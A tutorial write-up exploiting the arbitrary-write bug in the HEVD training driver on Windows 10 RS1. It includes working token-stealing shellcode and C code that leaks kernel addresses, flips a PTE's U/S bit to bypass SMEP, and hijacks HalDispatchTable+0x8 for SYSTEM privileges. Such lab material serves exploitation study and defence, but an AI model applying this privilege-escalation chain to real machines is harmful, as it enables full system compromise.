HEVD - Arbitrary Write Windows 10 RS1
Exploiting Arbitrary Write
Intro
Recently I have taken an interest in Windows kernel exploitation and came across this GitHub repo. The repo covers many different kinds of exploitation techniques in the Windows kernel. This write-up, and the ones that follow, walk through solving some of the challenges in this project. A big thanks to the creators of this project.
As the headline states, this write up will be about exploiting an Arbitrary Write.
Communicating with the driver
To start with, we need to find the symbolic link in order to talk to the device object of the driver. Looking at winobj from Sysinternals, we can see the following record -
Next we will take a look at IDA in order to find the IOCTL code we need to trigger the arbitrary write handler.
The value of the IOCTL is 0x0022200B.
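To make the IOCTL value less magical, here is a small sketch that splits it into its fields. The macro mirrors the bit layout of CTL_CODE from the Windows headers, but the HEVD_ prefixed names and the helper functions are my own, chosen so the snippet compiles without the Windows SDK.

```c
#include <stdint.h>

/* Same bit layout as the CTL_CODE macro from the Windows headers,
   re-declared under a hypothetical name so the snippet builds anywhere. */
#define HEVD_CTL_CODE(type, function, method, access) \
    (((uint32_t)(type) << 16) | ((uint32_t)(access) << 14) | \
     ((uint32_t)(function) << 2) | (uint32_t)(method))

#define HEVD_FILE_DEVICE_UNKNOWN 0x22u  /* value of FILE_DEVICE_UNKNOWN */
#define HEVD_METHOD_NEITHER      3u     /* value of METHOD_NEITHER      */
#define HEVD_FILE_ANY_ACCESS     0u     /* value of FILE_ANY_ACCESS     */

/* Extract the individual fields from a packed IOCTL code. */
static uint32_t ioctl_device_type(uint32_t code) { return code >> 16; }
static uint32_t ioctl_access(uint32_t code)      { return (code >> 14) & 0x3u; }
static uint32_t ioctl_function(uint32_t code)    { return (code >> 2) & 0xFFFu; }
static uint32_t ioctl_method(uint32_t code)      { return code & 0x3u; }
```

Decoding 0x0022200B this way gives device type 0x22, function 0x802 and method 3 (METHOD_NEITHER). With METHOD_NEITHER the I/O manager hands the driver the raw user-mode buffer pointer, which is why the handler has to validate it on its own.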
Code Overview
Let’s start by looking at ArbitraryWrite.c. We have a function called TriggerArbitraryWrite that takes one argument -
NTSTATUS
TriggerArbitraryWrite(
_In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
)
If we take a look at the ArbitraryWrite.h header file, we can see the following struct -
typedef struct _WRITE_WHAT_WHERE
{
PULONG_PTR What;
PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
It consists of two pointers, What and Where.
The What pointer stores the address of the data that we want to write, and the Where pointer holds the address in memory that we want to write our data to.
The rest of the function looks like this -
We can see a call to ProbeForRead, which verifies that the UserWriteWhatWhere buffer actually resides in the user portion of the address space and is correctly aligned. Note that this check covers only the structure itself, not the What and Where pointers stored inside it.
Then we see *v2 = *v1, which performs the actual copy.
Analysing The Vulnerability
Now that we have gone over the code, let’s understand where and why it is vulnerable. As the comment inside the code states:
This is a vanilla Arbitrary Memory Overwrite vulnerability because the developer is writing the value pointed by ‘What’ to memory location pointed by ‘Where’ without properly validating if the values pointed by ‘Where’ and ‘What’ resides in User mode.
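To see the bug in isolation, here is a minimal user-mode model of the vulnerable copy. It is not the driver's code: the type and function names are hypothetical, and the model simply dereferences both pointers without any validation, which is the behaviour described above.

```c
#include <stdint.h>

/* User-mode stand-in for the driver's WRITE_WHAT_WHERE structure. */
typedef struct {
    uintptr_t *What;   /* address of the value to copy     */
    uintptr_t *Where;  /* address the value is copied into */
} write_what_where_t;

/* Hypothetical model of the vulnerable copy: both pointers are
   dereferenced without checking where they point. */
static void model_trigger_arbitrary_write(const write_what_where_t *req)
{
    *(req->Where) = *(req->What);
}
```

In the real driver the same statement runs in kernel mode, so whoever controls What and Where controls a pointer-sized write anywhere in memory.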
Exploiting The Vulnerability
So, we have reviewed the code, understood the vulnerability, and it’s time to write our exploit. We are going to write the exploit for Windows 10 x64 RS1. I chose this version because with each new RS release Microsoft added more mitigations that make kernel exploits harder to develop.
Starting from RS2 Microsoft introduced kCFG, which stands for “Kernel Control Flow Guard”. This mitigation validates the targets of indirect call instructions and makes sure the memory location in which the function resides is a legitimate call target.
We won’t get into how to bypass kCFG here, but I will say it’s possible, and hopefully in the next write-up we will be facing a higher RS version.
In this write up we are going to deal with the following mitigations -
- kASLR (Kernel Address Space Layout Randomization).
- Page Table Randomization.
- NX (No Execute).
- SMEP (Supervisor Mode Execution Prevention).
The steps we are going to take are as follows:
- Write a shellcode that will steal the system access token and set it to our process.
- Allocate an rwx memory region in user mode for our shellcode.
- Change the U/S bit of the PTE of the page in which our shellcode was allocated.
- Modify one of the pointers inside HalDispatchTable to point to our user mode shellcode.
- Call a syscall to trigger the use of HalDispatchTable, which will then execute our shellcode as kernel.
Don’t worry if you don’t understand any of the steps, they will be explained later on.
Shellcode
I am going to use a common generic shellcode that will copy the system access token to our process.
[BITS 64]
_start:
mov rax, [gs:0x188] ; Current thread (_KTHREAD)
mov rax, [rax + 0xb8] ; Current process (_EPROCESS)
mov rbx, rax ; Copy current process (_EPROCESS) to rbx
__loop:
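mov rbx, [rbx + 0x2f0] ; ActiveProcessLinks (offset as encoded in the payload bytes below)
sub rbx, 0x2f0 ; Go back to the start of that process (_EPROCESS)
mov rcx, [rbx + 0x2e8] ; UniqueProcessId (PID) (offset as encoded in the payload bytes below)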
cmp rcx, 4 ; Compare PID to SYSTEM PID
jnz __loop ; Loop until SYSTEM PID is found
mov rcx, [rbx + 0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
and cl, 0xf0 ; Clear out _EX_FAST_REF RefCnt
mov [rax + 0x358], rcx ; Copy SYSTEM token to current process
xor rax, rax ; STATUS_SUCCESS
ret ; Done!
char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"
"\x48\x8B\x80\xB8\x00\x00\x00"
"\x48\x89\xC3\x48\x8B\x9B\xF0\x02\x00\x00"
"\x48\x81\xEB\xF0\x02\x00\x00"
"\x48\x8B\x8B\xE8\x02\x00\x00"
"\x48\x83\xF9\x04\x75\xE5"
"\x48\x8B\x8B\x58\x03\x00\x00"
"\x80\xE1\xF0\x48\x89\x88\x58\x03\x00\x00"
"\x48\x31\xC0\xC3";
Allocating rwx memory in user mode
Here we allocate an rwx memory region for our shellcode.
void* shellcode = VirtualAlloc(
NULL, // Address (let the system choose).
sizeof(payload), // Size.
MEM_COMMIT | MEM_RESERVE, // Allocation type (0x3000).
PAGE_EXECUTE_READWRITE // Protection (0x40).
);
// Copying the payload into the allocated user mode region.
RtlMoveMemory(
shellcode,
payload,
sizeof(payload)
);
Changing U/S bit of the PTE
Remember I said that the kernel is going to execute our code from a memory region in user mode? Well, in order to do so we need to bypass SMEP.
What is SMEP?
SMEP, or Supervisor Mode Execution Prevention, is a CPU feature that raises a fault whenever the CPU tries to execute code from a user mode page while running with CPL=0 (CPL, the Current Privilege Level, is 3 for user mode code). On Windows this causes a “Bug Check” with the following error message - ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY.
We can see if SMEP is enabled by looking at bit 20 of cr4 -
In this case, it’s the 1 at the start.
This is documented in Intel’s manual, volume 3A, sections 2.5 (CR4.SMEP flag) and 4.6 (per memory page settings).
So, when SMEP is enabled the CPU checks the U/S flag of the page, and if its value equals 0 (a supervisor page) the CPU allows the code to execute with CPL=0. Notice that the check is made per page.
In other words, once the flag is cleared the kernel will be able to run the code even though it resides in a user mode address range.
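As a quick illustration of the bit check, here is a tiny helper that tests bit 20 of a CR4 value. The function name is mine, and the sample value mentioned afterwards is only an assumed example of what a debugger might print, not a value taken from this machine.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP_BIT 20  /* position of the CR4.SMEP flag */

/* Returns true when the SMEP flag is set in the given CR4 value. */
static bool smep_enabled(uint64_t cr4)
{
    return ((cr4 >> CR4_SMEP_BIT) & 1u) != 0;
}
```

For an assumed CR4 value of 0x1506f8 the helper returns true, because the leading hex digit 1 is exactly bit 20. With that digit cleared (0x0506f8) it returns false.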
Alright, now that we have cleared up what SMEP is, it’s time to get our hands dirty and understand how to change the U/S flag of the PTE. I am assuming you know what a PTE is and how paging works, so I won’t get into that.
In order to modify the control flags of the PTE we first need to find the address of the PTE in memory. Remember that the base address from which we calculate it is randomized each time the OS reboots, so we need a way to find the base address dynamically.
nt!MiGetPteAddress
Quoting from Connor McGarr’s blog (link below) -
Windows has an API called nt!MiGetPteAddress that performs a specific formula to retrieve the associated PTE of a memory page.
The above function performs the following instructions:
- Bitwise shifts the contents of the RCX register to the right by 9 bits.
- Moves the value of 0x7FFFFFFFF8 into RAX.
- Bitwise AND’s the values of RCX and RAX together.
- Moves the value of 0FFFF818000000000 into RAX.
- Adds the values of RAX and RCX.
- Performs a return out of the function.
0FFFF818000000000 is a 64-bit address which is actually the base of the PTEs.
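The shift by 9 and the odd-looking mask are easier to read once you see them as "virtual page number times 8 bytes per PTE". The sketch below writes the formula both ways; the function names are hypothetical and the PTE base is passed in as a parameter, since the real value is randomized per boot.

```c
#include <stdint.h>

/* The steps listed above: shift right by 9, mask, add the PTE base. */
static uint64_t pte_address(uint64_t va, uint64_t pte_base)
{
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + pte_base;
}

/* Same result, written as "36-bit virtual page number times 8 bytes per PTE". */
static uint64_t pte_address_by_index(uint64_t va, uint64_t pte_base)
{
    uint64_t vpn = (va >> 12) & 0xFFFFFFFFFULL;  /* drop the 12-bit page offset */
    return pte_base + vpn * 8;                   /* each PTE is 8 bytes wide    */
}
```

For example, with a base of 0xFFFF818000000000 the page at virtual address 0x1000 (page number 1) has its PTE at 0xFFFF818000000008.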
You are probably asking yourself: how does this help us?
The nice thing about “Write What Where” is that it can be used as an arbitrary read as well ;)
We can find the offset of this function in the kernel and read the base address, which can be found at offset nt!MiGetPteAddress+0x13. This is how we will be able to dynamically calculate the PTE address and change the U/S flag.
The offset of nt!MiGetPteAddress in Windows 10 RS1 is at kernel_base_address + 0x51214.
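Here is a rough user-mode model of how the write turns into a read: point What at the address we want to read and Where at one of our own variables. The driver stand-in and both function names are hypothetical, and the sketch assumes a 64-bit build so that each pointer fills one 8-byte half of the 16-byte request.

```c
#include <stdint.h>
#include <string.h>

_Static_assert(sizeof(void *) == 8, "sketch assumes a 64-bit build");

/* Hypothetical stand-in for the driver: treats the 16-byte request as
   { What, Where } and performs *Where = *What, like the vulnerable handler. */
static void model_driver_ioctl(const unsigned char request[16])
{
    uint64_t *what;
    uint64_t *where;

    memcpy(&what, request, sizeof(what));
    memcpy(&where, request + 8, sizeof(where));
    *where = *what;
}

/* Arbitrary read built on the write: What = address to read,
   Where = a local variable that receives the value. */
static uint64_t model_arbitrary_read(const uint64_t *target)
{
    uint64_t result = 0;
    uint64_t *where = &result;
    unsigned char request[16];

    memcpy(request, &target, 8);      /* What  */
    memcpy(request + 8, &where, 8);   /* Where */
    model_driver_ioctl(request);
    return result;
}
```

The functions in the next part follow the same pattern, except that the request goes to the real driver and the target is a kernel address.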
Time to write some code
Let’s do it with code (the following code snippets are heavily inspired by Connor’s blog, with a few cosmetic changes of mine) -
We will start by getting the address of ntoskrnl.exe -
unsigned long long getKernelBaseAddress() {
void* lpImageBase[1024];
unsigned long lpcbNeeded;
int baseOfDrivers = EnumDeviceDrivers(
lpImageBase,
sizeof(lpImageBase),
&lpcbNeeded
);
if (!baseOfDrivers)
{
LOG("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
exit(1);
}
// ntoskrnl.exe is the first module dumped in the array.
unsigned long long kernelBaseAddress = (unsigned long long)lpImageBase[0];
LOG("[+] ntoskrnl.exe is located at: 0x%llx\n", kernelBaseAddress);
return kernelBaseAddress;
}
Then, we will be getting the PTEs base address -
unsigned long long getBasePteAddress(HANDLE hDriver, unsigned long long kernelBaseAddress) {
unsigned long long NtMiGetPteAddress = kernelBaseAddress + MI_PTE_GET_ADDRESS_OFFSET;
// Defining a pointer to write the base of PTEs to. (must initialize pointer, hence placeholder).
unsigned long long pteBaseAddressPlaceHolder = 0;
PULONGLONG baseOfPtes = &pteBaseAddressPlaceHolder;
// Defining buffer to send to driver
char buffer[0x10];
size_t oneQword = 0x8;
// Initializing buffer to junk to satisfy type error of memset.
memset(buffer, 0x41, 0x10);
// Actual buffer for extracting the PTE base.
memcpy(buffer, &NtMiGetPteAddress, oneQword);
memcpy(&buffer[0x8], &baseOfPtes, oneQword);
sendBufferToDriver(hDriver, buffer);
LOG("[+] Base of the page table entries: 0x%llx\n", (unsigned long long) * baseOfPtes);
return (unsigned long long) * baseOfPtes;
}
Now, let’s find the shellcode PTE -
unsigned long long getShellcodePTEAddress(unsigned long long baseOfPtes, void* shellcodeAddress) {
// Bitwise operations to locate PTE of shellcode page
unsigned long long shellcodePte = (unsigned long long)shellcodeAddress >> 9;
shellcodePte = shellcodePte & 0x7FFFFFFFF8;
return shellcodePte + baseOfPtes;
}
Next, read the control flags of the shellcode’s PTE, where the U/S bit can be found -
unsigned long long getShellcodePteControlFlagAddress(HANDLE hDriver, unsigned long long shellcodePte) {
// Defining a pointer to extract shellcode's PTE control bits. (must initialize pointer, hence placeholder).
unsigned long long placeholder = 0;
PULONGLONG pteControlFlagsPointer = &placeholder;
// Defining buffer to send to driver.
char buffer[0x10];
size_t oneQword = 0x8;
// Initializing buffer to junk to satisfy type error of memset
memset(buffer, 0x41, 0x10);
// Actual buffer for extracting PTE control bits
memcpy(buffer, &shellcodePte, oneQword);
memcpy(&buffer[0x8], &pteControlFlagsPointer, oneQword);
sendBufferToDriver(hDriver, buffer);
LOG("[+] PTE control bits for shellcode page: 0x%llx\n", (unsigned long long) * pteControlFlagsPointer);
return (unsigned long long) * pteControlFlagsPointer;
}
Lastly, let’s change the U/S flag -
void changeUSFlag(HANDLE hDriver, unsigned long long pteControlFlags , unsigned long long shellcodePte) {
// Corrupting U/S bit in PTE to make user mode page become kernel mode.
unsigned long long taintedPte;
taintedPte = pteControlFlags & 0xFFFFFFFFFFFFFFFB;
// Defining pointer for corrupted PTE bits.
PULONGLONG taintedptePointer = &taintedPte;
// Defining buffer to send to driver.
char buffer[0x10];
size_t oneQword = 0x8;
// Initializing buffer to junk to satisfy type error of memset.
memset(buffer, 0x41, 0x10);
// Actual buffer for corrupting PTE.
memcpy(buffer, &taintedptePointer, oneQword);
memcpy(&buffer[0x8], &shellcodePte, oneQword);
// Print update for corrupting PTE
LOG("[+] Corrupting PTE of shellcode to make U/S bit kernel mode...\n");
sendBufferToDriver(hDriver, buffer);
}
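The mask 0xFFFFFFFFFFFFFFFB used above is simply "everything except bit 2". A small sketch with named flag bits makes that explicit; the macro and function names are my own, and the sample PTE value in the note below is made up for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

#define PTE_PRESENT  (1ULL << 0)   /* P                               */
#define PTE_WRITABLE (1ULL << 1)   /* R/W                             */
#define PTE_USER     (1ULL << 2)   /* U/S: 1 = user, 0 = supervisor   */
#define PTE_NX       (1ULL << 63)  /* execute disable                 */

/* True when the page is marked as a user mode page. */
static bool pte_is_user(uint64_t pte)
{
    return (pte & PTE_USER) != 0;
}

/* Clears only the U/S bit and leaves every other bit untouched. */
static uint64_t pte_make_supervisor(uint64_t pte)
{
    return pte & ~PTE_USER;
}
```

For a made-up PTE value of 0x12345867 the result is 0x12345863: the low nibble goes from 7 (present, writable, user) to 3 (present, writable, supervisor).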
So, at this point we can say “good bye” to SMEP and move on to modifying the pointer inside HalDispatchTable.
Modifying HalDispatchTable
From “Geoff Chappell” -
The HAL_DISPATCH structure is a table of pointers to optional HAL functionality. The kernel keeps the one instance of this table. It’s in the kernel’s read-write data section and its address is exported as HalDispatchTable. The table initially has the kernel’s built-in implementations of most (but not all) functions. Many are trivial. Some are substantial. The HAL overrides some. No known HAL overrides all. Functionality that has no meaning to a particular HAL is left to the kernel’s default (and HAL programmers are spared from writing even dummy code for nothing that matters to them). Moreover, since the address is exported, rather than communicated specifically to the HAL, it seems to have been intended all along that the functionality is exposed to other kernel-mode modules such as drivers not only for them to call but also to override further.
What we are going to do is overwrite one of the pointers and then make a syscall that will trigger the execution of the function to which the pointer points.
In order to modify the HalDispatchTable we first need to find the ntoskrnl.exe base address, just as we did in the last part. Once we have the base address we need to know the offset of HalDispatchTable; in Windows 10 RS1 the offset is 0x2f43b8.
Now we will replace the pointer at offset HalDispatchTable+0x8. Why?
The answer can be found in the disassembly of the nt!NtQueryIntervalProfile syscall -
kd> uf nt!NtQueryIntervalProfile
nt!NtQueryIntervalProfile:
fffff800`96584df0 48895c2408 mov qword ptr [rsp+8],rbx
fffff800`96584df5 57 push rdi
fffff800`96584df6 4883ec20 sub rsp,20h
fffff800`96584dfa 488bda mov rbx,rdx
fffff800`96584dfd 65488b042588010000 mov rax,qword ptr gs:[188h]
fffff800`96584e06 408ab832020000 mov dil,byte ptr [rax+232h]
fffff800`96584e0d 4084ff test dil,dil
fffff800`96584e10 7419 je nt!NtQueryIntervalProfile+0x3b (fffff800`96584e2b) Branch
nt!NtQueryIntervalProfile+0x22:
fffff800`96584e12 48b80000ffffff7f0000 mov rax,7FFFFFFF0000h
fffff800`96584e1c 483bd0 cmp rdx,rax
fffff800`96584e1f 480f43d0 cmovae rdx,rax
fffff800`96584e23 8b02 mov eax,dword ptr [rdx]
fffff800`96584e25 8902 mov dword ptr [rdx],eax
fffff800`96584e27 eb02 jmp nt!NtQueryIntervalProfile+0x3b (fffff800`96584e2b) Branch
nt!NtQueryIntervalProfile+0x3b:
fffff800`96584e2b e81c000000 call nt!KeQueryIntervalProfile (fffff800`96584e4c)
fffff800`96584e30 4084ff test dil,dil
fffff800`96584e33 7411 je nt!NtQueryIntervalProfile+0x56 (fffff800`96584e46) Branch
nt!NtQueryIntervalProfile+0x45:
fffff800`96584e35 8903 mov dword ptr [rbx],eax
fffff800`96584e37 eb00 jmp nt!NtQueryIntervalProfile+0x49 (fffff800`96584e39) Branch
nt!NtQueryIntervalProfile+0x49:
fffff800`96584e39 33c0 xor eax,eax
fffff800`96584e3b 488b5c2430 mov rbx,qword ptr [rsp+30h]
fffff800`96584e40 4883c420 add rsp,20h
fffff800`96584e44 5f pop rdi
fffff800`96584e45 c3 ret
nt!NtQueryIntervalProfile+0x56:
fffff800`96584e46 8903 mov dword ptr [rbx],eax
fffff800`96584e48 ebef jmp nt!NtQueryIntervalProfile+0x49 (fffff800`96584e39) Branch
Inside that function we can see a call being made to nt!KeQueryIntervalProfile -
kd> uf nt!KeQueryIntervalProfile
nt!KeQueryIntervalProfile:
fffff800`96584e4c 4883ec48 sub rsp,48h
fffff800`96584e50 83f901 cmp ecx,1
fffff800`96584e53 7430 je nt!KeQueryIntervalProfile+0x39 (fffff800`96584e85) Branch
nt!KeQueryIntervalProfile+0x9:
fffff800`96584e55 ba18000000 mov edx,18h
fffff800`96584e5a 894c2420 mov dword ptr [rsp+20h],ecx
fffff800`96584e5e 4c8d4c2450 lea r9,[rsp+50h]
fffff800`96584e63 4c8d442420 lea r8,[rsp+20h]
fffff800`96584e68 8d4ae9 lea ecx,[rdx-17h]
fffff800`96584e6b ff15c714deff call qword ptr [nt!HalDispatchTable+0x8 (fffff800`96366338)]
fffff800`96584e71 85c0 test eax,eax
fffff800`96584e73 7818 js nt!KeQueryIntervalProfile+0x41 (fffff800`96584e8d) Branch
nt!KeQueryIntervalProfile+0x29:
fffff800`96584e75 807c242400 cmp byte ptr [rsp+24h],0
fffff800`96584e7a 7411 je nt!KeQueryIntervalProfile+0x41 (fffff800`96584e8d) Branch
nt!KeQueryIntervalProfile+0x30:
fffff800`96584e7c 8b442428 mov eax,dword ptr [rsp+28h]
nt!KeQueryIntervalProfile+0x34:
fffff800`96584e80 4883c448 add rsp,48h
fffff800`96584e84 c3 ret
nt!KeQueryIntervalProfile+0x39:
fffff800`96584e85 8b0595c2dfff mov eax,dword ptr [nt!KiProfileAlignmentFixupInterval (fffff800`96381120)]
fffff800`96584e8b ebf3 jmp nt!KeQueryIntervalProfile+0x34 (fffff800`96584e80) Branch
nt!KeQueryIntervalProfile+0x41:
fffff800`96584e8d 33c0 xor eax,eax
fffff800`96584e8f ebef jmp nt!KeQueryIntervalProfile+0x34 (fffff800`96584e80) Branch
Here we can see an indirect call through the pointer stored at HalDispatchTable+0x8. That is where we will put our pointer.
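If the idea of hijacking a dispatch table is new to you, this toy user-mode model may help. Everything in it is hypothetical (the two-slot table, the handlers and the function names); it only shows that whoever overwrites a slot decides what the next indirect call through that slot executes.

```c
typedef long (*dispatch_fn)(void);

/* Two stand-in handlers: the original one and the one we inject. */
static long default_handler(void)  { return 1; }
static long injected_handler(void) { return 0x1337; }

/* Hypothetical two-slot table; on a 64-bit build slot 1 sits at byte
   offset 0x8, like the pointer at nt!HalDispatchTable+0x8. */
static dispatch_fn model_table[2] = { default_handler, default_handler };

/* Stand-in for KeQueryIntervalProfile: an indirect call through slot 1. */
static long model_query_interval_profile(void)
{
    return model_table[1]();
}
```

Before the overwrite model_query_interval_profile() returns 1; after model_table[1] = injected_handler it returns 0x1337 without the caller changing at all.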
It’s time to write the final part of the exploit -
void modifyHalDispatchTable(unsigned long long kernelBaseAddress, HANDLE hDriver, void* shellcode) {
unsigned long long halDispatchTable = kernelBaseAddress + HAL_DISPATCH_TABLE_OFFSET;
// Defining buffer to send to driver.
char buffer[0x10];
size_t oneQword = 0x8;
// Initializing buffer to junk to satisfy type error of memset.
memset(buffer, 0x41, 0x10);
// Actual buffer for overwriting [nt!HalDispatchTable+0x8] with shellcode address.
memcpy(buffer, &shellcode, oneQword);
memcpy(&buffer[0x8], &halDispatchTable, oneQword);
sendBufferToDriver(hDriver, buffer);
printf("[+] Overwrote [nt!HalDispatchTable+0x8] with shellcode address...\n");
}
In the above, we overwrite the HalDispatchTable entry with a pointer to our shellcode. All that is left is to call NtQueryIntervalProfile so that the kernel invokes it -
void triggerExploit() {
// Locating nt!NtQueryIntervalProfile.
NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
GetModuleHandle(
TEXT("ntdll.dll")),
"NtQueryIntervalProfile"
);
// Error handling.
if (!NtQueryIntervalProfile)
{
printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
exit(1);
}
// Print update for found ntdll!NtQueryIntervalProfile.
printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", (unsigned long long)NtQueryIntervalProfile);
// Invoking nt!NtQueryIntervalProfile to execute [nt!HalDispatchTable+0x8]
printf("[+] Calling nt!NtQueryIntervalProfile to execute [nt!HalDispatchTable+0x8]...\n");
// Calling nt!NtQueryIntervalProfile.
ULONG exploit = 0;
NtQueryIntervalProfile(
0x1234,
&exploit
);
}
That’s it, our process is now running with a system token!
Wrapping up
In this write-up we saw how to exploit an arbitrary “Write What Where” in the Windows kernel. As I said above, there are many different mitigations in the latest versions of Windows 10, and it gets even harder when VBS is in place. Here I have shown how to bypass some of the mitigations, like SMEP and Page Table Randomization. There are more ways to bypass those mitigations than the ones I have shown.